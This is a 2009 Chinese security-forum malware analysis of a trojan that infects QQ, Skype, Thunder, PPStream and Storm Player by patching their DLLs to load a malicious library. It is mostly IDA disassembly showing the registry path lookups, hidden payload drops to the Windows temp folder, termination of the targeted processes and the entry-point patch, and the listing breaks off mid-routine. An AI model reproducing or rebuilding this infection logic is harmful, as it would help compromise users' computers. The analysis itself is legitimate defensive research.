好友
阅读权限255
听众
最后登录1970-1-1
|
zzage
发表于 2009-3-12 18:28
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【文章标题】分析感染QQ,迅雷,Skype,PPStream等软件的木马
【文章作者】ZzAge
【文章目标】某木马
【相关工具】IDA
【作者 Q Q】85400516
【作者邮箱】zzage@163.com
【作者主页】http://hi.baidu.com/zzage
【文章日期】2009年03月12日
其实我是标题党,这木马只是修改QQ,QQ游戏,迅雷,Skype,PPStream,暴风影音的DLL文件,然后加载木马的DLL文件~从网络上下载木马!
但是传播得比较厉害的话,危害还是有点儿大的,毕竟QQ,迅雷等这些软件大多机器都会有安装的...
一,查找注册表,获取要感染的软件路径!
HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Applications\\PPStream.exe\\shell\\open\\comm
HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Applications\\Storm.exe\\shell\\open\\command
HKEY_LOCAL_MACHINE\\SOFTWARE\\Tencent\\QQ\\Install
HKEY_LOCAL_MACHINE\\SOFTWARE\\Tencent\\QQ2009\\Install
HKEY_LOCAL_MACHINE\\SOFTWARE\\Tencent\\QQGame\\SYS\\GameDirectory
HKEY_LOCAL_MACHINE\\SOFTWARE\\Skype\\Phone\\SkypePath
HKEY_LOCAL_MACHINE\\SOFTWARE\\Thunder Network\\ThunderOem\\thunder_backwnd\\Path.nsp0:00401250 push ecx
.nsp0:00401251 push esi
.nsp0:00401252 mov esi, [esp+8+hKey]
.nsp0:00401256 cmp esi, 6 ; switch 7 cases
.nsp0:00401259 mov [esp+8+cbData], 400h
.nsp0:00401261 ja loc_401331 ; default
.nsp0:00401267 jmp off_401428[esi*4] ; switch jump
.nsp0:0040126E
.nsp0:0040126E loc_40126E: ; DATA XREF: .nsp0:off_401428�o
.nsp0:0040126E lea eax, [esp+8+hKey] ; jumptable 00401267 case 5
.nsp0:00401272 push eax ; phkResult
.nsp0:00401273 push 1 ; samDesired
.nsp0:00401275 push 0 ; ulOptions
.nsp0:00401277 push offset SubKey ; "SOFTWARE\\Classes\\Applications\\PPStream."...
.nsp0:0040127C push 80000002h ; hKey
.nsp0:00401281 call RegOpenKeyExW
.nsp0:00401287 jmp loc_401335
.nsp0:0040128C ; ---------------------------------------------------------------------------
.nsp0:0040128C
.nsp0:0040128C loc_40128C: ; CODE XREF: sub_401250+17�j
.nsp0:0040128C ; DATA XREF: .nsp0:off_401428�o ...
.nsp0:0040128C lea ecx, [esp+8+hKey] ; jumptable 00401267 case 4
.nsp0:00401290 push ecx ; phkResult
.nsp0:00401291 push 1 ; samDesired
.nsp0:00401293 push 0 ; ulOptions
.nsp0:00401295 push offset aSoftwareClas_0 ; "SOFTWARE\\Classes\\Applications\\Storm.exe"...
.nsp0:0040129A push 80000002h ; hKey
.nsp0:0040129F call RegOpenKeyExW
.nsp0:004012A5 jmp loc_401335
.nsp0:004012AA ; ---------------------------------------------------------------------------
.nsp0:004012AA
.nsp0:004012AA loc_4012AA: ; CODE XREF: sub_401250+17�j
.nsp0:004012AA ; DATA XREF: .nsp0:off_401428�o
.nsp0:004012AA lea edx, [esp+8+hKey] ; jumptable 00401267 case 0
.nsp0:004012AE push edx ; phkResult
.nsp0:004012AF push 1 ; samDesired
.nsp0:004012B1 push 0 ; ulOptions
.nsp0:004012B3 push offset aSoftwareTencen ; "SOFTWARE\\Tencent\\QQ"
.nsp0:004012B8 push 80000002h ; hKey
.nsp0:004012BD call RegOpenKeyExW
.nsp0:004012C3 jmp short loc_401335
.nsp0:004012C5 ; ---------------------------------------------------------------------------
.nsp0:004012C5
.nsp0:004012C5 loc_4012C5: ; CODE XREF: sub_401250+17�j
.nsp0:004012C5 ; DATA XREF: .nsp0:off_401428�o
.nsp0:004012C5 lea eax, [esp+8+hKey] ; jumptable 00401267 case 1
.nsp0:004012C9 push eax ; phkResult
.nsp0:004012CA push 1 ; samDesired
.nsp0:004012CC push 0 ; ulOptions
.nsp0:004012CE push offset aSoftwareTenc_0 ; "SOFTWARE\\Tencent\\QQ2009"
.nsp0:004012D3 push 80000002h ; hKey
.nsp0:004012D8 call RegOpenKeyExW
.nsp0:004012DE jmp short loc_401335
.nsp0:004012E0 ; ---------------------------------------------------------------------------
.nsp0:004012E0
.nsp0:004012E0 loc_4012E0: ; CODE XREF: sub_401250+17�j
.nsp0:004012E0 ; DATA XREF: .nsp0:off_401428�o
.nsp0:004012E0 lea ecx, [esp+8+hKey] ; jumptable 00401267 case 2
.nsp0:004012E4 push ecx ; phkResult
.nsp0:004012E5 push 1 ; samDesired
.nsp0:004012E7 push 0 ; ulOptions
.nsp0:004012E9 push offset aSoftwareTenc_1 ; "SOFTWARE\\Tencent\\QQGame\\SYS"
.nsp0:004012EE push 80000002h ; hKey
.nsp0:004012F3 call RegOpenKeyExW
.nsp0:004012F9 jmp short loc_401335
.nsp0:004012FB ; ---------------------------------------------------------------------------
.nsp0:004012FB
.nsp0:004012FB loc_4012FB: ; CODE XREF: sub_401250+17�j
.nsp0:004012FB ; DATA XREF: .nsp0:off_401428�o
.nsp0:004012FB lea edx, [esp+8+hKey] ; jumptable 00401267 case 3
.nsp0:004012FF push edx ; phkResult
.nsp0:00401300 push 1 ; samDesired
.nsp0:00401302 push 0 ; ulOptions
.nsp0:00401304 push offset aSoftwareSkypeP ; "SOFTWARE\\Skype\\Phone"
.nsp0:00401309 push 80000002h ; hKey
.nsp0:0040130E call RegOpenKeyExW
.nsp0:00401314 jmp short loc_401335
.nsp0:00401316 ; ---------------------------------------------------------------------------
.nsp0:00401316
.nsp0:00401316 loc_401316: ; CODE XREF: sub_401250+17�j
.nsp0:00401316 ; DATA XREF: .nsp0:off_401428�o
.nsp0:00401316 lea eax, [esp+8+hKey] ; jumptable 00401267 case 6
.nsp0:0040131A push eax ; phkResult
.nsp0:0040131B push 1 ; samDesired
.nsp0:0040131D push 0 ; ulOptions
.nsp0:0040131F push offset aSoftwareThunde ; "SOFTWARE\\Thunder Network\\ThunderOem\\thu"...
.nsp0:00401324 push 80000002h ; hKey
.nsp0:00401329 call RegOpenKeyExW
.nsp0:0040132F jmp short loc_401335
.nsp0:00401331 ; ---------------------------------------------------------------------------
.nsp0:00401331
.nsp0:00401331 loc_401331: ; CODE XREF: sub_401250+11�j
.nsp0:00401331 mov eax, [esp+8+hKey] ; default
.nsp0:00401335
.nsp0:00401335 loc_401335: ; CODE XREF: sub_401250+37�j
.nsp0:00401335 ; sub_401250+55�j ...
.nsp0:00401335 test eax, eax
.nsp0:00401337 jnz loc_40141B
.nsp0:0040133D cmp esi, 6 ; switch 7 cases
.nsp0:00401340 ja loc_4013FE ; default
.nsp0:00401346 jmp off_401444[esi*4] ; switch jump
.nsp0:0040134D
.nsp0:0040134D loc_40134D: ; DATA XREF: .nsp0:off_401444�o
.nsp0:0040134D mov edx, dword_40AAA0 ; jumptable 00401346 case 5
.nsp0:00401353 lea ecx, [esp+8+cbData]
.nsp0:00401357 push ecx
.nsp0:00401358 push edx
.nsp0:00401359 push 0
.nsp0:0040135B push 0
.nsp0:0040135D push offset dword_40AABC
.nsp0:00401362 jmp loc_4013EF
.nsp0:00401367 ; ---------------------------------------------------------------------------
.nsp0:00401367
.nsp0:00401367 loc_401367: ; CODE XREF: sub_401250+F6�j
.nsp0:00401367 ; DATA XREF: .nsp0:off_401444�o
.nsp0:00401367 mov edx, Str ; jumptable 00401346 case 4
.nsp0:0040136D lea ecx, [esp+8+cbData]
.nsp0:00401371 push ecx
.nsp0:00401372 push edx
.nsp0:00401373 push 0
.nsp0:00401375 push 0
.nsp0:00401377 push offset dword_40AABC
.nsp0:0040137C jmp short loc_4013EF
.nsp0:0040137E ; ---------------------------------------------------------------------------
.nsp0:0040137E
.nsp0:0040137E loc_40137E: ; CODE XREF: sub_401250+F6�j
.nsp0:0040137E ; DATA XREF: .nsp0:off_401444�o
.nsp0:0040137E mov edx, lpFileName ; jumptable 00401346 case 0
.nsp0:00401384 lea ecx, [esp+8+cbData]
.nsp0:00401388 push ecx
.nsp0:00401389 push edx
.nsp0:0040138A push 0
.nsp0:0040138C push 0
.nsp0:0040138E push offset aInstall ; "Install"
.nsp0:00401393 jmp short loc_4013EF
.nsp0:00401395 ; ---------------------------------------------------------------------------
.nsp0:00401395
.nsp0:00401395 loc_401395: ; CODE XREF: sub_401250+F6�j
.nsp0:00401395 ; DATA XREF: .nsp0:off_401444�o
.nsp0:00401395 mov edx, dword_40AAB4 ; jumptable 00401346 case 1
.nsp0:0040139B lea ecx, [esp+8+cbData]
.nsp0:0040139F push ecx
.nsp0:004013A0 push edx
.nsp0:004013A1 push 0
.nsp0:004013A3 push 0
.nsp0:004013A5 push offset aInstall ; "Install"
.nsp0:004013AA jmp short loc_4013EF
.nsp0:004013AC ; ---------------------------------------------------------------------------
.nsp0:004013AC
.nsp0:004013AC loc_4013AC: ; CODE XREF: sub_401250+F6�j
.nsp0:004013AC ; DATA XREF: .nsp0:off_401444�o
.nsp0:004013AC mov edx, dword_40AAB0 ; jumptable 00401346 case 2
.nsp0:004013B2 lea ecx, [esp+8+cbData]
.nsp0:004013B6 push ecx
.nsp0:004013B7 push edx
.nsp0:004013B8 push 0
.nsp0:004013BA push 0
.nsp0:004013BC push offset aGamedirectory ; "GameDirectory"
.nsp0:004013C1 jmp short loc_4013EF
.nsp0:004013C3 ; ---------------------------------------------------------------------------
.nsp0:004013C3
.nsp0:004013C3 loc_4013C3: ; CODE XREF: sub_401250+F6�j
.nsp0:004013C3 ; DATA XREF: .nsp0:off_401444�o
.nsp0:004013C3 mov edx, dword_40AAAC ; jumptable 00401346 case 3
.nsp0:004013C9 lea ecx, [esp+8+cbData]
.nsp0:004013CD push ecx
.nsp0:004013CE push edx
.nsp0:004013CF push 0
.nsp0:004013D1 push 0
.nsp0:004013D3 push offset aSkypepath ; "SkypePath"
.nsp0:004013D8 jmp short loc_4013EF
.nsp0:004013DA ; ---------------------------------------------------------------------------
.nsp0:004013DA
.nsp0:004013DA loc_4013DA: ; CODE XREF: sub_401250+F6�j
.nsp0:004013DA ; DATA XREF: .nsp0:off_401444�o
.nsp0:004013DA mov edx, lpData ; jumptable 00401346 case 6
.nsp0:004013E0 lea ecx, [esp+8+cbData]
.nsp0:004013E4 push ecx ; lpcbData
.nsp0:004013E5 push edx ; lpData
.nsp0:004013E6 push 0 ; lpType
.nsp0:004013E8 push 0 ; lpReserved
.nsp0:004013EA push offset ValueName ; "Path"
.nsp0:004013EF
.nsp0:004013EF loc_4013EF: ; CODE XREF: sub_401250+112�j
.nsp0:004013EF ; sub_401250+12C�j ...
.nsp0:004013EF mov eax, [esp+1Ch+hKey]
.nsp0:004013F3 push eax ; hKey
.nsp0:004013F4 call RegQueryValueExW
.nsp0:004013FA test eax, eax
.nsp0:004013FC jnz short loc_401421
.nsp0:004013FE
.nsp0:004013FE loc_4013FE: ; CODE XREF: sub_401250+F0�j
.nsp0:004013FE cmp [esp+8+cbData], 100h ; default
.nsp0:00401406 ja short loc_401421
.nsp0:00401408 mov ecx, [esp+8+hKey]
.nsp0:0040140C push ecx ; hKey
.nsp0:0040140D call RegCloseKey
.nsp0:00401413 mov eax, 1
.nsp0:00401418 pop esi
.nsp0:00401419 pop ecx
.nsp0:0040141A retn
.nsp0:0040141B ; ---------------------------------------------------------------------------
.nsp0:0040141B
.nsp0:0040141B loc_40141B: ; CODE XREF: sub_401250+E7�j
.nsp0:0040141B call GetLastError
.nsp0:00401421
.nsp0:00401421 loc_401421: ; CODE XREF: sub_401250+1AC�j
.nsp0:00401421 ; sub_401250+1B6�j
.nsp0:00401421 xor eax, eax
.nsp0:00401423 pop esi
.nsp0:00401424 pop ecx
.nsp0:00401425 retn
C:\\WINDOWS\\temp\\uninstaller.exe
C:\\WINDOWS\\temp\\playList0.dat.nsp0:00401560 push ecx
.nsp0:00401561 push ebx
.nsp0:00401562 mov ebx, [esp+8+dwShareMode]
.nsp0:00401566 push ebp
.nsp0:00401567 push esi
.nsp0:00401568 test ebx, ebx
.nsp0:0040156A push edi
.nsp0:0040156B jnz short loc_40157C
.nsp0:0040156D mov eax, hModule
.nsp0:00401572 push offset Type ; "BINARY"
.nsp0:00401577 push 65h
.nsp0:00401579 push eax
.nsp0:0040157A jmp short loc_401593
.nsp0:0040157C ; ---------------------------------------------------------------------------
.nsp0:0040157C
.nsp0:0040157C loc_40157C: ; CODE XREF: sub_401560+B�j
.nsp0:0040157C cmp ebx, 1
.nsp0:0040157F jnz loc_40167A
.nsp0:00401585 mov ecx, hModule
.nsp0:0040158B push offset Type ; "BINARY"
.nsp0:00401590 push 66h ; lpName
.nsp0:00401592 push ecx ; hModule
.nsp0:00401593
.nsp0:00401593 loc_401593: ; CODE XREF: sub_401560+1A�j
.nsp0:00401593 call FindResourceA
.nsp0:00401599 mov esi, eax
.nsp0:0040159B test esi, esi
.nsp0:0040159D jz loc_40167A
.nsp0:004015A3 mov edx, hModule
.nsp0:004015A9 push esi ; hResInfo
.nsp0:004015AA push edx ; hModule
.nsp0:004015AB call LoadResource
.nsp0:004015B1 mov edi, eax
.nsp0:004015B3 test edi, edi
.nsp0:004015B5 jz loc_40167A
.nsp0:004015BB mov eax, hModule
.nsp0:004015C0 push esi ; hResInfo
.nsp0:004015C1 push eax ; hModule
.nsp0:004015C2 call SizeofResource
.nsp0:004015C8 push edi ; hResData
.nsp0:004015C9 mov ebp, eax
.nsp0:004015CB call LockResource
.nsp0:004015D1 test ebx, ebx
.nsp0:004015D3 mov esi, eax
.nsp0:004015D5 jnz short loc_4015EE
.nsp0:004015D7 push ebx
.nsp0:004015D8 push 80h
.nsp0:004015DD push 2
.nsp0:004015DF push ebx
.nsp0:004015E0 push 1
.nsp0:004015E2 push 0C0000000h
.nsp0:004015E7 push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:004015EC jmp short loc_40160D
.nsp0:004015EE ; ---------------------------------------------------------------------------
.nsp0:004015EE
.nsp0:004015EE loc_4015EE: ; CODE XREF: sub_401560+75�j
.nsp0:004015EE cmp ebx, 1
.nsp0:004015F1 jnz loc_40167A
.nsp0:004015F7 push 0 ; hTemplateFile
.nsp0:004015F9 push 80h ; dwFlagsAndAttributes
.nsp0:004015FE push 2 ; dwCreationDisposition
.nsp0:00401600 push 0 ; lpSecurityAttributes
.nsp0:00401602 push ebx ; dwShareMode
.nsp0:00401603 push 0C0000000h ; dwDesiredAccess
.nsp0:00401608 push offset FileName ; "C:\\WINDOWS\\temp\\uninstaller.exe"
.nsp0:0040160D
.nsp0:0040160D loc_40160D: ; CODE XREF: sub_401560+8C�j
.nsp0:0040160D call CreateFileW
.nsp0:00401613 mov ecx, ebp
.nsp0:00401615 dec ebp
.nsp0:00401616 test ecx, ecx
.nsp0:00401618 mov edi, eax
.nsp0:0040161A jz short loc_40163A
.nsp0:0040161C lea ebx, [ebp+1]
.nsp0:0040161F mov ebp, WriteFile
.nsp0:00401625
.nsp0:00401625 loc_401625: ; CODE XREF: sub_401560+D4�j
.nsp0:00401625 lea edx, [esp+14h+NumberOfBytesWritten]
.nsp0:00401629 push 0 ; lpOverlapped
.nsp0:0040162B push edx ; lpNumberOfBytesWritten
.nsp0:0040162C push 1 ; nNumberOfBytesToWrite
.nsp0:0040162E push esi ; lpBuffer
.nsp0:0040162F push edi ; hFile
.nsp0:00401630 call ebp ; WriteFile
.nsp0:00401632 inc esi
.nsp0:00401633 dec ebx
.nsp0:00401634 jnz short loc_401625
.nsp0:00401636 mov ebx, [esp+14h+dwShareMode]
.nsp0:0040163A
.nsp0:0040163A loc_40163A: ; CODE XREF: sub_401560+BA�j
.nsp0:0040163A push edi ; hObject
.nsp0:0040163B call CloseHandle
.nsp0:00401641 test ebx, ebx
.nsp0:00401643 jnz short loc_40165D
.nsp0:00401645 push 2 ; dwFileAttributes
.nsp0:00401647 push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:0040164C call SetFileAttributesW
.nsp0:00401652 pop edi
.nsp0:00401653 pop esi
.nsp0:00401654 pop ebp
.nsp0:00401655 mov eax, 1
.nsp0:0040165A pop ebx
.nsp0:0040165B pop ecx
.nsp0:0040165C retn
.nsp0:0040165D ; ---------------------------------------------------------------------------
.nsp0:0040165D
.nsp0:0040165D loc_40165D: ; CODE XREF: sub_401560+E3�j
.nsp0:0040165D cmp ebx, 1
.nsp0:00401660 jnz short loc_40166F
.nsp0:00401662 push 2 ; dwFileAttributes
.nsp0:00401664 push offset FileName ; "C:\\WINDOWS\\temp\\uninstaller.exe"
.nsp0:00401669 call SetFileAttributesW
.nsp0:0040166F
.nsp0:0040166F loc_40166F: ; CODE XREF: sub_401560+100�j
.nsp0:0040166F pop edi
.nsp0:00401670 pop esi
.nsp0:00401671 pop ebp
.nsp0:00401672 mov eax, 1
.nsp0:00401677 pop ebx
.nsp0:00401678 pop ecx
.nsp0:00401679 retn
.nsp0:0040167A ; ---------------------------------------------------------------------------
.nsp0:0040167A
.nsp0:0040167A loc_40167A: ; CODE XREF: sub_401560+1F�j
.nsp0:0040167A ; sub_401560+3D�j ...
.nsp0:0040167A pop edi
.nsp0:0040167B pop esi
.nsp0:0040167C pop ebp
.nsp0:0040167D xor eax, eax
.nsp0:0040167F pop ebx
.nsp0:00401680 pop ecx
.nsp0:00401681 retn
qq.exe,skype.exe,storm.exe,ppstream.exe,thunder5.exe,ppsap.exe.nsp0:00401460 push ecx
.nsp0:00401461 push esi
.nsp0:00401462 push edi
.nsp0:00401463 push 128h ; unsigned int
.nsp0:00401468 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:0040146D add esp, 4
.nsp0:00401470 mov edi, eax
.nsp0:00401472 push 0 ; th32ProcessID
.nsp0:00401474 push 2 ; dwFlags
.nsp0:00401476 call CreateToolhelp32Snapshot
.nsp0:0040147B mov esi, eax
.nsp0:0040147D push edi ; lppe
.nsp0:0040147E push esi ; hSnapshot
.nsp0:0040147F mov [esp+14h+hSnapshot], esi
.nsp0:00401483 mov dword ptr [edi], 128h
.nsp0:00401489 call Process32First
.nsp0:0040148E test eax, eax
.nsp0:00401490 jz loc_40154D
.nsp0:00401496 call GetLastError
.nsp0:0040149C cmp eax, 12h
.nsp0:0040149F jz loc_401554
.nsp0:004014A5 push ebx
.nsp0:004014A6 mov ebx, OpenProcess
.nsp0:004014AC push ebp
.nsp0:004014AD mov ebp, TerminateProcess
.nsp0:004014B3 lea esi, [edi+24h]
.nsp0:004014B6
.nsp0:004014B6 loc_4014B6: ; CODE XREF: sub_401460+E1�j
.nsp0:004014B6 push esi
.nsp0:004014B7 push offset dword_40830C
.nsp0:004014BC call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014C1 add esp, 8
.nsp0:004014C4 test eax, eax
.nsp0:004014C6 jz short loc_401522
.nsp0:004014C8 push esi
.nsp0:004014C9 push offset dword_408300
.nsp0:004014CE call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014D3 add esp, 8
.nsp0:004014D6 test eax, eax
.nsp0:004014D8 jz short loc_401522
.nsp0:004014DA push esi
.nsp0:004014DB push offset dword_4082F4
.nsp0:004014E0 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014E5 add esp, 8
.nsp0:004014E8 test eax, eax
.nsp0:004014EA jz short loc_401522
.nsp0:004014EC push esi
.nsp0:004014ED push offset dword_4082E4
.nsp0:004014F2 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014F7 add esp, 8
.nsp0:004014FA test eax, eax
.nsp0:004014FC jz short loc_401522
.nsp0:004014FE push esi
.nsp0:004014FF push offset dword_4082D4
.nsp0:00401504 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:00401509 add esp, 8
.nsp0:0040150C test eax, eax
.nsp0:0040150E jz short loc_401522
.nsp0:00401510 push esi
.nsp0:00401511 push offset dword_4082C8
.nsp0:00401516 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:0040151B add esp, 8
.nsp0:0040151E test eax, eax
.nsp0:00401520 jnz short loc_401534
.nsp0:00401522
.nsp0:00401522 loc_401522: ; CODE XREF: sub_401460+66�j
.nsp0:00401522 ; sub_401460+78�j ...
.nsp0:00401522 mov eax, [edi+8]
.nsp0:00401525 push eax ; dwProcessId
.nsp0:00401526 push 0 ; bInheritHandle
.nsp0:00401528 push 1F0FFFh ; dwDesiredAccess
.nsp0:0040152D call ebx ; OpenProcess
.nsp0:0040152F push 0 ; uExitCode
.nsp0:00401531 push eax ; hProcess
.nsp0:00401532 call ebp ; TerminateProcess
.nsp0:00401534
.nsp0:00401534 loc_401534: ; CODE XREF: sub_401460+C0�j
.nsp0:00401534 mov ecx, [esp+14h+hSnapshot]
.nsp0:00401538 push edi ; lppe
.nsp0:00401539 push ecx ; hSnapshot
.nsp0:0040153A call Process32Next
.nsp0:0040153F test eax, eax
.nsp0:00401541 jnz loc_4014B6
.nsp0:00401547 mov esi, [esp+14h+hSnapshot]
.nsp0:0040154B pop ebp
.nsp0:0040154C pop ebx
.nsp0:0040154D
.nsp0:0040154D loc_40154D: ; CODE XREF: sub_401460+30�j
.nsp0:0040154D push esi ; hObject
.nsp0:0040154E call CloseHandle
.nsp0:00401554
.nsp0:00401554 loc_401554: ; CODE XREF: sub_401460+3F�j
.nsp0:00401554 pop edi
.nsp0:00401555 pop esi
.nsp0:00401556 pop ecx
.nsp0:00401557 retn
1:在入口处,写入数据,使它跳向他的在第二处的地方写入的数据的地方6198F9E2 . /E9 EBA80000 jmp 6199A2D2
6199A2D2 > \68 771D807C push kernel32.LoadLibraryA
6199A2D7 . E8 0C000000 call 6199A2E8 ; PUSH ASCII "tmweotu.cfw"
6199A2DC . 74 6D 77 65 6>ascii "tmweotu.cfw",0
6199A2E8 > 36:FF5424 04 call dword ptr [esp+4]
6199A2ED . 83C4 04 add esp, 4
6199A2F0 . 53 push ebx
6199A2F1 . 8B5D 08 mov ebx, dword ptr [ebp+8]
6199A2F4 . 56 push esi
6199A2F5 .^ E9 ED56FFFF jmp 6198F9E7
.nsp0:00401990 sub esp, 218h
.nsp0:00401996 push ebx
.nsp0:00401997 push ebp
.nsp0:00401998 push esi
.nsp0:00401999 push edi
.nsp0:0040199A xor ebp, ebp
.nsp0:0040199C mov ecx, 7Fh
.nsp0:004019A1 xor eax, eax
.nsp0:004019A3 lea edi, [esp+228h+var_1FE]
.nsp0:004019A7 mov [esp+228h+Str], bp
.nsp0:004019AC push 0Bh
.nsp0:004019AE rep stosd
.nsp0:004019B0 stosw
.nsp0:004019B2 xor eax, eax
.nsp0:004019B4 lea ecx, [esp+22Ch+Source]
.nsp0:004019B8 mov [esp+22Ch+var_216], eax
.nsp0:004019BC push ecx
.nsp0:004019BD mov [esp+230h+var_212], eax
.nsp0:004019C1 xor esi, esi
.nsp0:004019C3 mov [esp+230h+var_20E], eax
.nsp0:004019C7 xor ebx, ebx
.nsp0:004019C9 mov [esp+230h+var_20A], eax
.nsp0:004019CD mov [esp+230h+Source], bp
.nsp0:004019D2 mov [esp+230h+var_206], eax
.nsp0:004019D6 call sub_4011E0
.nsp0:004019DB mov eax, [esp+230h+arg_0]
.nsp0:004019E2 add esp, 8
.nsp0:004019E5 cmp eax, 6 ; switch 7 cases
.nsp0:004019E8 ja loc_401E14 ; default
.nsp0:004019EE jmp off_401E4C[eax*4] ; switch jump
.nsp0:004019F5
.nsp0:004019F5 loc_4019F5: ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:004019F5 mov edx, lpFileName ; jumptable 004019EE case 0
.nsp0:004019FB push 1 ; char
.nsp0:004019FD push edx ; lpFileName
.nsp0:004019FE call sub_401960
.nsp0:00401A03 add esp, 8
.nsp0:00401A06 test al, al
.nsp0:00401A08 jz loc_401E14 ; default
.nsp0:00401A0E mov eax, lpFileName
.nsp0:00401A13 lea ecx, [esp+228h+Str]
.nsp0:00401A17 push eax ; Source
.nsp0:00401A18 push ecx ; Dest
.nsp0:00401A19 call _wcscat
.nsp0:00401A1E mov edx, lpFileName
.nsp0:00401A24 push offset aQqgroupmng_dll ; "\\QQGroupMng.dll"
.nsp0:00401A29 push edx ; Dest
.nsp0:00401A2A call _wcscat
.nsp0:00401A2F mov edi, Sleep
.nsp0:00401A35 add esp, 10h
.nsp0:00401A38
.nsp0:00401A38 loc_401A38: ; CODE XREF: sub_401990+CC�j
.nsp0:00401A38 cmp ebx, 32h
.nsp0:00401A3B jge short loc_401A60
.nsp0:00401A3D mov ecx, lpFileName
.nsp0:00401A43 lea eax, [esp+228h+Source]
.nsp0:00401A47 push eax ; int
.nsp0:00401A48 push 64h ; lDistanceToMove
.nsp0:00401A4A push ecx ; lpFileName
.nsp0:00401A4B call sub_401690
.nsp0:00401A50 add esp, 0Ch
.nsp0:00401A53 mov esi, eax
.nsp0:00401A55 inc ebx
.nsp0:00401A56 push 0Ah ; dwMilliseconds
.nsp0:00401A58 call edi ; Sleep
.nsp0:00401A5A cmp esi, ebp
.nsp0:00401A5C jz short loc_401A38
.nsp0:00401A5E jmp short loc_401A68
.nsp0:00401A60 ; ---------------------------------------------------------------------------
.nsp0:00401A60
.nsp0:00401A60 loc_401A60: ; CODE XREF: sub_401990+AB�j
.nsp0:00401A60 cmp esi, ebp
.nsp0:00401A62 jz loc_401E14 ; default
.nsp0:00401A68
.nsp0:00401A68 loc_401A68: ; CODE XREF: sub_401990+CE�j
.nsp0:00401A68 lea edx, [esp+228h+Str]
.nsp0:00401A6C push offset word_4084A0 ; Source
.nsp0:00401A71 push edx ; Dest
.nsp0:00401A72 call _wcscat
.nsp0:00401A77 lea eax, [esp+230h+Source]
.nsp0:00401A7B lea ecx, [esp+230h+Str]
.nsp0:00401A7F push eax
.nsp0:00401A80 push ecx
.nsp0:00401A81 jmp loc_401E0C
.nsp0:00401A86 ; ---------------------------------------------------------------------------
.nsp0:00401A86
.nsp0:00401A86 loc_401A86: ; CODE XREF: sub_401990+5E�j
.nsp0:00401A86 ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:00401A86 mov edx, dword_40AAB4 ; jumptable 004019EE case 1
.nsp0:00401A8C push 1 ; char
.nsp0:00401A8E push edx ; lpFileName
.nsp0:00401A8F call sub_401960
.nsp0:00401A94 add esp, 8
.nsp0:00401A97 test al, al
.nsp0:00401A99 jz loc_401E14 ; default
.nsp0:00401A9F mov eax, dword_40AAB4
.nsp0:00401AA4 lea ecx, [esp+228h+Str]
.nsp0:00401AA8 push eax ; Source
.nsp0:00401AA9 push ecx ; Dest
.nsp0:00401AAA call _wcscat
.nsp0:00401AAF mov edx, dword_40AAB4
.nsp0:00401AB5 push offset off_40847C ; Source
.nsp0:00401ABA push edx ; Dest
.nsp0:00401ABB call _wcscat
.nsp0:00401AC0 mov edi, Sleep
.nsp0:00401AC6 add esp, 10h
.nsp0:00401AC9
.nsp0:00401AC9 loc_401AC9: ; CODE XREF: sub_401990+15D�j
.nsp0:00401AC9 cmp ebx, 32h
.nsp0:00401ACC jge short loc_401AF1
.nsp0:00401ACE mov ecx, dword_40AAB4
.nsp0:00401AD4 lea eax, [esp+228h+Source]
.nsp0:00401AD8 push eax ; int
.nsp0:00401AD9 push 64h ; lDistanceToMove
.nsp0:00401ADB push ecx ; lpFileName
.nsp0:00401ADC call sub_401690
.nsp0:00401AE1 add esp, 0Ch
.nsp0:00401AE4 mov esi, eax
.nsp0:00401AE6 inc ebx
.nsp0:00401AE7 push 0Ah ; dwMilliseconds
.nsp0:00401AE9 call edi ; Sleep
.nsp0:00401AEB cmp esi, ebp
.nsp0:00401AED jz short loc_401AC9
.nsp0:00401AEF jmp short loc_401AF9
.nsp0:00401AF1 ; ---------------------------------------------------------------------------
.nsp0:00401AF1
.nsp0:00401AF1 loc_401AF1: ; CODE XREF: sub_401990+13C�j
.nsp0:00401AF1 cmp esi, ebp
.nsp0:00401AF3 jz loc_401E14 ; default
.nsp0:00401AF9
.nsp0:00401AF9 loc_401AF9: ; CODE XREF: sub_401990+15F�j
.nsp0:00401AF9 lea edx, [esp+228h+Str]
.nsp0:00401AFD push offset off_408470 ; Source
.nsp0:00401B02 push edx ; Dest
.nsp0:00401B03 call _wcscat
.nsp0:00401B08 lea eax, [esp+230h+Source]
.nsp0:00401B0C lea ecx, [esp+230h+Str]
.nsp0:00401B10 push eax
.nsp0:00401B11 push ecx
.nsp0:00401B12 jmp loc_401E0C
.nsp0:00401B17 ; ---------------------------------------------------------------------------
.nsp0:00401B17
.nsp0:00401B17 loc_401B17: ; CODE XREF: sub_401990+5E�j
.nsp0:00401B17 ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:00401B17 mov edx, dword_40AAB0 ; jumptable 004019EE case 2
.nsp0:00401B1D push 1 ; char
.nsp0:00401B1F push edx ; lpFileName
.nsp0:00401B20 call sub_401960
.nsp0:00401B25 add esp, 8
.nsp0:00401B28 test al, al
.nsp0:00401B2A jz loc_401E14 ; default
.nsp0:00401B30 mov eax, dword_40AAB0
.nsp0:00401B35 lea ecx, [esp+228h+Str]
.nsp0:00401B39 push eax ; Source
.nsp0:00401B3A push ecx ; Dest
.nsp0:00401B3B call _wcscat
.nsp0:00401B40 mov edx, dword_40AAB0
.nsp0:00401B46 push offset aCommonProcmsg_ ; "\\common\\ProcMsg.dll"
.nsp0:00401B4B push edx ; Dest
.nsp0:00401B4C call _wcscat
